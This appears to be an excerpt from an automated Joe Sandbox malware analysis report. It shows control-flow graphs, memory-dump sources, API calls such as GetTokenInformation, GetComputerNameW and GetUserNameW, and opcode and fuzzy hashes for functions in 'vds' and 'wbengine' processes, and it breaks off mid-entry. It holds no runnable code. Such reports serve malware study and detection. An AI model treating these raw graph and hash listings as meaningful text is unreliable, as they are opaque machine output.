                                                                                                                                                                      control_flow_graph 79 b78070-b7817e 81 b78180 79->81 82 b7813d-b781a5 79->82 83 b78184 81->83 84 b7815f 81->84 97 b781a7 82->97 98 b781bd-b781ca 82->98 85 b78186 CloseHandle 83->85 86 b7818c-b78192 83->86 84->82 88 b78161 84->88 85->86 90 b78115-b78118 86->90 91 b78194 86->91 89 b78163-b78170 call ba7164 88->89 89->85 102 b78172 89->102 94 b780a7 90->94 95 b78119-b7811a 90->95 91->90 96 b7819a 91->96 95->94 100 b7811c 95->100 101 b7813c 96->101 105 b780f3 98->105 106 b781d0 98->106 103 b7820f 100->103 101->83 102->86 107 b78215-b7821e 103->107 108 b7808e-b78096 103->108 109 b780f5 105->109 110 b7808c 105->110 115 b780c3 106->115 116 b781fe-b78201 GetTokenInformation 106->116 107->108 118 b78224 107->118 108->83 108->94 109->110 117 b78077 109->117 110->108 115->116 121 b780c9 115->121 116->103 130 b781b7 116->130 119 b781d7-b781de call ba715c 117->119 118->119 120 b78226 118->120 128 b781e3-b781e6 119->128 120->119 123 b78228-b782ee call b75d90 120->123 126 b780ca-b780d8 GetTokenInformation 121->126 145 b782f0 123->145 146 b7830c-b7831e 123->146 129 b7810f 126->129 128->126 144 b78089 128->144 131 b78111 129->131 132 b7812d 129->132 130->103 135 b781b9-b781bb 130->135 131->132 137 b78113 131->137 139 b78133 132->139 140 b780a8 132->140 135->98 137->90 139->101 143 b781ed-b781f0 139->143 142 b780aa-b780ad 140->142 142->89 147 b780b3-b78203 142->147 148 b781f6 143->148 149 b780da-b780f1 143->149 144->126 150 b7808b 144->150 145->146 151 b782f2 145->151 154 b782a1-b782ba call b75d90 call b7ec00 146->154 155 b78320 146->155 147->89 158 b78209 147->158 148->149 153 b781fc 148->153 149->142 150->110 156 b782f7-b782fc call b75d90 151->156 153->116 154->155 155->156 157 b78322 155->157 169 b78253-b78265 call b91280 156->169 170 b78302 156->170 157->156 163 b78324-b78326 157->163 166 b78328 163->166 172 b78335 166->172 173 b782df-b7832b 166->173 169->166 179 b7826b 169->179 170->169 175 b78308-b7830a 170->175 178 b7826e-b78285 172->178 173->172 180 b7832d-b78331 173->180 175->146 181 b78287 178->181 182 b7829b-b7829d 178->182 179->178 183 b78239 179->183 180->172 184 b7824c 181->184 182->154 183->166 185 b7823f-b78243 183->185 184->182 186 b7824e-b78252 184->186 185->156 185->184 186->178
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000021.00000002.2624588607.0000000000B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_33_2_b70000_vds.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: bfa7abbba837048b5084d14a6e3f10e10a947a6e49ec2fa660cf16e8a7df21b7
                                                                                                                                                                      • Instruction ID: 5930bc568993b4a95766668fff78e6b9a5c1642cea6e08f120931f75834597c0
                                                                                                                                                                      • Opcode Fuzzy Hash: bfa7abbba837048b5084d14a6e3f10e10a947a6e49ec2fa660cf16e8a7df21b7
                                                                                                                                                                      • Instruction Fuzzy Hash: B361463068CA459FC7658B28889C3357BE0FB59360F98C6DAE47FD39A1DF244C459352
                                                                                                                                                                      Function 00B75910 Relevance: 1.9, APIs: 1, Instructions: 607COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 187 b75910-b75912 188 b75915-b75928 call ba9970 187->188 189 b75950-b75968 187->189 195 b759b8 call b90df0 188->195 189->188 190 b7596a 189->190 192 b75970-b7597b 190->192 193 b7592f 190->193 196 b759d4 192->196 197 b7597d 192->197 193->188 198 b75931-b8072c 193->198 207 b759bd-b759c2 call b75d90 195->207 202 b7593b-b75a15 call b911a0 196->202 203 b759d8-b759de 196->203 197->196 199 b7597f-b75981 197->199 204 b80732-b80738 198->204 205 b80806-b80809 198->205 206 b75983-b75a38 199->206 217 b75994-b7599c 203->217 222 b759e0 203->222 209 b8073e 204->209 210 b80800 204->210 223 b8079d-b807a6 205->223 206->217 218 b75a3e 206->218 219 b759c7-b759ce 207->219 209->210 216 b80744-b80774 209->216 210->205 221 b806b3-b806b7 210->221 236 b8077a-b8081c 216->236 237 b806d5-b806d9 216->237 226 b75a02 217->226 227 b7599e-b759f7 217->227 231 b75a2c-b75a34 218->231 232 b759d0 219->232 233 b75a1a-b75a26 219->233 221->223 228 b806bd 221->228 222->217 224 b759e2-b759ec 222->224 229 b807a8 223->229 230 b80791-b80793 223->230 234 b75a62-b75a6e 224->234 235 b759ee-b759ef 224->235 226->192 227->226 228->223 239 b806c3-b807fe 228->239 229->230 242 b807aa 229->242 240 b807ca-b807cc 230->240 241 b759d9-b759de call ba2190 231->241 232->233 243 b759d2 232->243 233->231 244 b759a1-b759b5 call b75e10 233->244 245 b75a75-b75ab3 call b91280 234->245 246 b75a70 234->246 235->206 247 b759f1 235->247 236->223 251 b806db 237->251 252 b806df 237->252 239->210 241->217 241->222 242->240 243->241 244->195 261 b75a08-b75a0b 244->261 275 b75ab5 245->275 276 b75abb-b75af2 245->276 246->245 254 b75a72 246->254 247->188 251->252 257 b806dd 251->257 252->223 254->245 257->252 262 b8c0cc 257->262 261->217 266 b75a0d 261->266 263 b8c0e8-b8c102 262->263 264 b8c0ce-b8c0d0 262->264 267 b8c0d2-b8c0df 263->267 268 b8c104 263->268 264->267 271 b75932 266->271 272 b75991 266->272 278 b8c0e7 267->278 268->267 268->278 272->271 277 b75993 272->277 275->276 280 b75ab7-b75ab9 275->280 281 b75af3 276->281 277->217 280->276 281->281
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000021.00000002.2624588607.0000000000B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_33_2_b70000_vds.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 61e7e04614083fc9a4d415ed1ed9d586c41edeef07ca5b9990f411115d9a6df2
                                                                                                                                                                      • Instruction ID: 3207053290701fbf9526482282ff434f60ff4b6a68a555dad520864c74726c4d
                                                                                                                                                                      • Opcode Fuzzy Hash: 61e7e04614083fc9a4d415ed1ed9d586c41edeef07ca5b9990f411115d9a6df2
                                                                                                                                                                      • Instruction Fuzzy Hash: 51F1193171CE488FCBA9A72C58813B977D1EB99310F5885FEE05EC3296DD649C06D382
                                                                                                                                                                      Function 00B75B42 Relevance: 1.6, APIs: 1, Instructions: 92COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 332 b75b42-b75b47 call b75d90 334 b75b4c-b75b52 332->334 336 b75c42-b75c62 call b91280 334->336 337 b75b0d 334->337 351 b75c24 336->351 352 b75c68 336->352 337->336 338 b75b13 337->338 340 b75c8f-b75c96 338->340 342 b75c29 340->342 343 b75c98-b75c9a 340->343 344 b75cc2-b75cc9 call b752a0 342->344 345 b75c2f-b75c36 342->345 347 b75c9c 343->347 359 b75ccb 344->359 360 b75c69 344->360 345->344 350 b75c3c 345->350 356 b75d0e-b75d18 347->356 357 b75bfa 347->357 350->332 353 b75c26 351->353 354 b75c14-b75c19 351->354 353->354 358 b75c28 353->358 364 b75cc0 354->364 365 b75c20-b75c21 354->365 361 b75d54 356->361 362 b75d1a 356->362 357->356 363 b75c00 357->363 358->342 359->347 367 b75ccd 359->367 368 b75c6f 360->368 369 b75b68-b75d75 360->369 366 b75d5f 361->366 370 b75d4b-b75d52 362->370 363->354 364->344 365->352 377 b75d65 366->377 367->347 372 b75ccf-b75cdd 367->372 368->369 374 b75c75 368->374 370->361 371 b75d45-b75d47 370->371 371->366 375 b75d49 371->375 376 b75cdf-b75ce4 CreateThread 372->376 374->340 375->366 375->370 378 b75c01-b75d41 376->378 379 b75cea 376->379 377->377 378->370 389 b75d43 378->389 379->378 381 b75cf0-b75cf6 379->381 381->365 382 b75cff-b75d01 381->382 384 b75d07 382->384 385 b75bb4 382->385 384->385 388 b75d0d 384->388 386 b75cda-b75cdd 385->386 386->376 389->361
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000021.00000002.2624588607.0000000000B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_33_2_b70000_vds.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 2ff8010c23fac40248132f603dcb160a69be8753e27de13806aa853a5623418f
                                                                                                                                                                      • Instruction ID: 1eb005069438cc16bbb49d397f06436c86356e7e256c01735db068c38d64b78d
                                                                                                                                                                      • Opcode Fuzzy Hash: 2ff8010c23fac40248132f603dcb160a69be8753e27de13806aa853a5623418f
                                                                                                                                                                      • Instruction Fuzzy Hash: 2D219F2020CF458FDB7B9B388888B7466D1EB54310F68C5E6847FCF2A2DAE48C449755
                                                                                                                                                                      Function 00B75B09 Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 390 b75b09-b75b3b 394 b75cff-b75d01 390->394 395 b75d07 394->395 396 b75bb4-b75ce4 CreateThread 394->396 395->396 398 b75d0d 395->398 400 b75c01-b75d41 396->400 401 b75cea 396->401 408 b75d43 400->408 409 b75d4b-b75d52 400->409 401->400 403 b75cf0-b75cf6 401->403 403->394 404 b75c20-b75c68 403->404 410 b75d54 408->410 409->410 411 b75d45-b75d47 409->411 412 b75d5f 410->412 411->412 413 b75d49 411->413 414 b75d65 412->414 413->409 413->412 414->414
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000021.00000002.2624588607.0000000000B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_33_2_b70000_vds.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 355f5de826a502d2b078035f50b0d1b19bc6bd6d86d359f9387c1ff3fa9cfd06
                                                                                                                                                                      • Instruction ID: 584625b6a4da65aa77c361d93e6e842fda1500d9725b34882bf97d46de642cc0
                                                                                                                                                                      • Opcode Fuzzy Hash: 355f5de826a502d2b078035f50b0d1b19bc6bd6d86d359f9387c1ff3fa9cfd06
                                                                                                                                                                      • Instruction Fuzzy Hash: C801D23050DF468FEB765A348D987797BD0EB14324F2481EB88BFCA191EEE44901A752
                                                                                                                                                                      Function 00B75B87 Relevance: 1.5, APIs: 1, Instructions: 23threadCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 415 b75b87-b75b99 CreateThread 418 b75cff-b75d01 415->418 419 b75d07 418->419 420 b75bb4-b75ce4 CreateThread 418->420 419->420 422 b75d0d 419->422 424 b75c01-b75d41 420->424 425 b75cea 420->425 432 b75d43 424->432 433 b75d4b-b75d52 424->433 425->424 427 b75cf0-b75cf6 425->427 427->418 428 b75c20-b75c68 427->428 434 b75d54 432->434 433->434 435 b75d45-b75d47 433->435 436 b75d5f 434->436 435->436 437 b75d49 435->437 438 b75d65 436->438 437->433 437->436 438->438
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000021.00000002.2624588607.0000000000B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_33_2_b70000_vds.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateThread
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2422867632-0
                                                                                                                                                                      • Opcode ID: a986bd5c00f5553bdb8598d00602888b78738e64b994e3da4fa4453f2922062f
                                                                                                                                                                      • Instruction ID: be0951479a81d0ba9becdcd651e1a9ab4f05d961e865e3bab411bf4645999281
                                                                                                                                                                      • Opcode Fuzzy Hash: a986bd5c00f5553bdb8598d00602888b78738e64b994e3da4fa4453f2922062f
                                                                                                                                                                      • Instruction Fuzzy Hash: 51E0863060DB448FDB6A9F245D503293AE5EB88310F1541DEC45ED72D1DFA919064786
                                                                                                                                                                      Function 00B7599B Relevance: 1.3, APIs: 1, Instructions: 48COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 439 b7599b-b7599e 440 b759f7 439->440 441 b75a02 440->441 443 b759d4 441->443 444 b7597d 441->444 446 b7593b-b75a15 call b911a0 443->446 447 b759d8-b759de 443->447 444->443 445 b7597f-b75981 444->445 448 b75983-b75a38 445->448 453 b75994-b7599c 447->453 456 b759e0 447->456 448->453 454 b75a3e 448->454 453->441 458 b7599e 453->458 459 b75a2c-b75a34 454->459 456->453 457 b759e2-b759ec 456->457 460 b75a62-b75a6e 457->460 461 b759ee-b759ef 457->461 458->440 462 b759d9-b759de call ba2190 459->462 463 b75a75-b75ab3 call b91280 460->463 464 b75a70 460->464 461->448 465 b759f1 call ba9970 461->465 462->453 462->456 478 b75ab5 463->478 479 b75abb-b75af2 463->479 464->463 468 b75a72 464->468 475 b759b8 call b90df0 465->475 468->463 481 b759bd-b759c2 call b75d90 475->481 478->479 482 b75ab7-b75ab9 478->482 484 b75af3 479->484 485 b759c7-b759ce 481->485 482->479 484->484 486 b759d0 485->486 487 b75a1a-b75a26 485->487 486->487 488 b759d2 486->488 487->459 489 b759a1-b759b5 call b75e10 487->489 488->462 489->475 492 b75a08-b75a0b 489->492 492->453 493 b75a0d 492->493 495 b75932 493->495 496 b75991 493->496 496->495 497 b75993 496->497 497->453
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000021.00000002.2624588607.0000000000B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_33_2_b70000_vds.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: wcscpy
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1284135714-0
                                                                                                                                                                      • Opcode ID: 51412a402b8cd50030cf07c80cfd4b00c1a38cf92c70ea7e66de183ec09a8362
                                                                                                                                                                      • Instruction ID: 7bcdab300da469182f06ed70b3f72e17a2fc1182f3ce63ba0b938adf785ce788
                                                                                                                                                                      • Opcode Fuzzy Hash: 51412a402b8cd50030cf07c80cfd4b00c1a38cf92c70ea7e66de183ec09a8362
                                                                                                                                                                      • Instruction Fuzzy Hash: 8A01D67091DF84CFD6769B18448127976E1FB94320F28C5EA92AEC7192C9E44D00A342
                                                                                                                                                                      Function 00B78090 Relevance: 1.3, APIs: 1, Instructions: 14COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 498 b78090-b78096 499 b78184 498->499 500 b78186 CloseHandle 499->500 501 b7818c-b78192 499->501 500->501 502 b78115-b78118 501->502 503 b78194 501->503 504 b780a7 502->504 505 b78119-b7811a 502->505 503->502 506 b7819a 503->506 505->504 507 b7811c 505->507 508 b7813c 506->508 509 b7820f 507->509 508->499 510 b78215-b7821e 509->510 511 b7808e-b78096 509->511 510->511 513 b78224 510->513 511->499 511->504 514 b781d7-b781e6 call ba715c 513->514 515 b78226 513->515 525 b780ca-b7810f GetTokenInformation 514->525 526 b78089 514->526 515->514 516 b78228-b782ee call b75d90 515->516 527 b782f0 516->527 528 b7830c-b7831e 516->528 531 b78111 525->531 532 b7812d 525->532 526->525 530 b7808b 526->530 527->528 533 b782f2 527->533 534 b782a1-b782ba call b75d90 call b7ec00 528->534 535 b78320 528->535 536 b7808c 530->536 531->532 537 b78113 531->537 540 b78133 532->540 541 b780a8 532->541 538 b782f7-b782fc call b75d90 533->538 534->535 535->538 539 b78322 535->539 536->511 537->502 559 b78253-b78265 call b91280 538->559 560 b78302 538->560 539->538 546 b78324-b78326 539->546 540->508 547 b781ed-b781f0 540->547 544 b780aa-b780ad 541->544 549 b78163-b78170 call ba7164 544->549 550 b780b3-b78203 544->550 554 b78328 546->554 551 b781f6 547->551 552 b780da-b780f1 547->552 549->500 570 b78172 549->570 550->549 568 b78209 550->568 551->552 558 b781fc 551->558 552->544 563 b78335 554->563 564 b782df-b7832b 554->564 566 b781fe-b78201 GetTokenInformation 558->566 559->554 575 b7826b 559->575 560->559 567 b78308-b7830a 560->567 574 b7826e-b78285 563->574 564->563 577 b7832d-b78331 564->577 566->509 582 b781b7 566->582 567->528 570->501 578 b78287 574->578 579 b7829b-b7829d 574->579 575->574 581 b78239 575->581 577->563 583 b7824c 578->583 579->534 581->554 584 b7823f-b78243 581->584 582->509 586 b781b9-b781ca 582->586 583->579 585 b7824e-b78252 583->585 584->538 584->583 585->574 589 b780f3 586->589 590 b781d0 586->590 589->536 591 b780f5 589->591 590->566 595 b780c3 590->595 591->536 596 b78077 591->596 595->566 597 b780c9 595->597 596->514 597->525
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000021.00000002.2624588607.0000000000B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_33_2_b70000_vds.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseHandle
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2962429428-0
                                                                                                                                                                      • Opcode ID: 618394ff9deb9f6b5e010b5aaee4db8be701b981e1d63e6b3fb36a727850c086
                                                                                                                                                                      • Instruction ID: ca6242b5f98d80d8dc15360a26377ca9d8f2d775a86425cf0d59cb0fb8460d07
                                                                                                                                                                      • Opcode Fuzzy Hash: 618394ff9deb9f6b5e010b5aaee4db8be701b981e1d63e6b3fb36a727850c086
                                                                                                                                                                      • Instruction Fuzzy Hash: 7BC08C719E89029A523A028C2C2F0F026C0C20E370FCCC0C68C3EF0E20DD248E039097
                                                                                                                                                                      Function 00B7817F Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 598 b7817f 599 b78184 598->599 600 b78186 CloseHandle 599->600 601 b7818c-b78192 599->601 600->601 602 b78115-b78118 601->602 603 b78194 601->603 604 b780a7 602->604 605 b78119-b7811a 602->605 603->602 606 b7819a 603->606 605->604 607 b7811c 605->607 608 b7813c 606->608 609 b7820f 607->609 608->599 610 b78215-b7821e 609->610 611 b7808e-b78096 609->611 610->611 613 b78224 610->613 611->599 611->604 614 b781d7-b781e6 call ba715c 613->614 615 b78226 613->615 625 b780ca-b7810f GetTokenInformation 614->625 626 b78089 614->626 615->614 616 b78228-b782ee call b75d90 615->616 627 b782f0 616->627 628 b7830c-b7831e 616->628 631 b78111 625->631 632 b7812d 625->632 626->625 630 b7808b 626->630 627->628 633 b782f2 627->633 634 b782a1-b782ba call b75d90 call b7ec00 628->634 635 b78320 628->635 636 b7808c 630->636 631->632 637 b78113 631->637 640 b78133 632->640 641 b780a8 632->641 638 b782f7-b782fc call b75d90 633->638 634->635 635->638 639 b78322 635->639 636->611 637->602 659 b78253-b78265 call b91280 638->659 660 b78302 638->660 639->638 646 b78324-b78326 639->646 640->608 647 b781ed-b781f0 640->647 644 b780aa-b780ad 641->644 649 b78163-b78170 call ba7164 644->649 650 b780b3-b78203 644->650 654 b78328 646->654 651 b781f6 647->651 652 b780da-b780f1 647->652 649->600 670 b78172 649->670 650->649 668 b78209 650->668 651->652 658 b781fc 651->658 652->644 663 b78335 654->663 664 b782df-b7832b 654->664 666 b781fe-b78201 GetTokenInformation 658->666 659->654 675 b7826b 659->675 660->659 667 b78308-b7830a 660->667 674 b7826e-b78285 663->674 664->663 677 b7832d-b78331 664->677 666->609 682 b781b7 666->682 667->628 670->601 678 b78287 674->678 679 b7829b-b7829d 674->679 675->674 681 b78239 675->681 677->663 683 b7824c 678->683 679->634 681->654 684 b7823f-b78243 681->684 682->609 686 b781b9-b781ca 682->686 683->679 685 b7824e-b78252 683->685 684->638 684->683 685->674 689 b780f3 686->689 690 b781d0 686->690 689->636 691 b780f5 689->691 690->666 695 b780c3 690->695 691->636 696 b78077 691->696 695->666 697 b780c9 695->697 696->614 697->625
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000021.00000002.2624588607.0000000000B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_33_2_b70000_vds.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseHandle
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2962429428-0
                                                                                                                                                                      • Opcode ID: a0153765961d18982154f5649a6418830ea2767f573826a199b39b51e69f8ae7
                                                                                                                                                                      • Instruction ID: 8587d28e17772083880ce630c401665a1d5c6db9ca240ad8216af06f1a6b2798
                                                                                                                                                                      • Opcode Fuzzy Hash: a0153765961d18982154f5649a6418830ea2767f573826a199b39b51e69f8ae7
                                                                                                                                                                      • Instruction Fuzzy Hash: D0C048A59D860986513A268C2C1E0A225D0861A770F8CC492AC3EBAA62D9684D4291A2

                                                                                                                                                                      Executed Functions

                                                                                                                                                                      Function 00AF52A0 Relevance: 1.6, APIs: 1, Instructions: 137COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 282 af52a0-af52a5 283 af532e-af533f 282->283 284 af52ab-af52f5 282->284 289 af536b-af536f 283->289 284->283 286 af52f7-af53fe 284->286 292 b30d4c-b30d4e 286->292 293 af5400-af5424 286->293 290 af5375-af5390 289->290 291 af5441-af544a 289->291 297 af53c3 290->297 298 af5392-af539a 290->298 302 af53c4-af53ca GetSystemDefaultLangID 291->302 303 af5450 291->303 299 af539b 293->299 300 af542a 293->300 298->299 304 af539d-af53a1 299->304 305 af5413-af5419 299->305 300->299 301 af5430-af543e 300->301 301->291 306 af5475-af547b 302->306 312 af5411 303->312 313 af53c1 303->313 308 af53a7 304->308 309 af52b0-af52b5 304->309 306->292 308->309 310 af53ad 308->310 314 af53af-af53f1 310->314 315 af53f3-af53f9 310->315 312->302 312->305 313->297 313->312 314->305 314->315 319 af532a 315->319 320 af5355 315->320 319->320 322 af532c 319->322 323 af52e8-af5363 320->323 324 af52d1-af52e7 320->324 322->283 327 af5365 323->327 328 af53d1-af53d5 323->328 324->323 327->328 330 af5367-af5369 327->330 328->304 329 af53d7 328->329 329->293 332 af534b 329->332 330->289 332->293 333 af5351-af5353 332->333 333->320
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetSystemDefaultLangID.KERNELBASE ref: 00AF53C4
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000023.00000002.2624154980.0000000000AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_35_2_af0000_wbengine.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: DefaultLangSystem
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 706401283-0
                                                                                                                                                                      • Opcode ID: be85cc28eff309c6b04ec446b1d1922c7f56a33d23bc4027ac3bc4e0d37bd274
                                                                                                                                                                      • Instruction ID: 832e427a07b7a200081a4c049776ca41ae49bbad3f516b12abd95581fde53232
                                                                                                                                                                      • Opcode Fuzzy Hash: be85cc28eff309c6b04ec446b1d1922c7f56a33d23bc4027ac3bc4e0d37bd274
                                                                                                                                                                      • Instruction Fuzzy Hash: 5E41D361D0DE9D8FD72A43F944742B47BE1AB123E6F9D02D6F7828F0E2D1984C819726
                                                                                                                                                                      Function 00B10080 Relevance: 5.0, APIs: 3, Instructions: 466COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 0 b10080-b10286 2 b10099-b10575 0->2 3 b1028c 0->3 7 b10155 2->7 8 b1057b 2->8 4 b10445 3->4 4->2 6 b1044b-b10457 4->6 10 b10458-b10472 GetComputerNameW 6->10 9 b102ef-b10495 call afe050 * 2 7->9 8->7 11 b10581-b10587 8->11 9->10 52 b1043e 9->52 15 b1024c-b10253 10->15 16 b103ee-b103f4 10->16 13 b1058b 11->13 18 b10181 VirtualFree 13->18 19 b1058c-b10591 13->19 20 b10255 15->20 21 b101e6 15->21 40 b100da-b1023f 16->40 41 b103fa 16->41 23 b101a8-b102ac call b27164 18->23 24 b10597 19->24 25 b104ab-b104af 19->25 26 b102d3 20->26 29 b102b1-b102be 21->29 30 b101ec-b10313 call b2715c 21->30 23->29 24->25 32 b1059d 24->32 49 b104c7 25->49 26->21 39 b102d9 26->39 36 b102c4 29->36 37 b103bf-b103d9 GetUserNameW 29->37 55 b10318-b1031e 30->55 32->25 36->37 44 b102ca 36->44 45 b10331 37->45 39->9 40->15 53 b10241-b1024a 40->53 41->40 46 b10400 41->46 44->26 50 b10171 45->50 51 b10337 45->51 54 b1b1ee-b1b49f 46->54 58 b104cc-b104e6 call b29970 GetComputerNameW 49->58 59 b10173 50->59 60 b1013f-b10146 50->60 51->50 61 b1033d 51->61 52->4 53->15 53->29 56 b10324 55->56 57 b10568-b1056b 55->57 56->57 62 b1032a 56->62 57->58 69 b10131 58->69 70 b104ec-b10514 58->70 64 b10230 59->64 60->13 65 b105d0-b105d9 61->65 62->45 64->49 68 b10236-b105c2 64->68 65->54 68->49 72 b105c8-b105c9 68->72 73 b10137 69->73 74 b10089-b1008c 69->74 70->57 72->65 73->74 75 b1013d 73->75 74->23 77 b10092 74->77 75->18 75->60 77->23 78 b10098 77->78 78->2
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000023.00000002.2624154980.0000000000AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_35_2_af0000_wbengine.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ComputerName
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3545744682-0
                                                                                                                                                                      • Opcode ID: f2c426ce008c29bb37f5d3562478f99eada15862b80321597c233d777d3b9804
                                                                                                                                                                      • Instruction ID: 441d4db06a8da177fd8c242ffdd47ac298c2924ab895320c65ac886c6804de01
                                                                                                                                                                      • Opcode Fuzzy Hash: f2c426ce008c29bb37f5d3562478f99eada15862b80321597c233d777d3b9804
                                                                                                                                                                      • Instruction Fuzzy Hash: DFD11631428B0D8BC724FF58D8857EAB7E1FBA4310F98469FE846C7164DAB496C586C2
                                                                                                                                                                      Function 00AF8070 Relevance: 4.7, APIs: 3, Instructions: 236COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
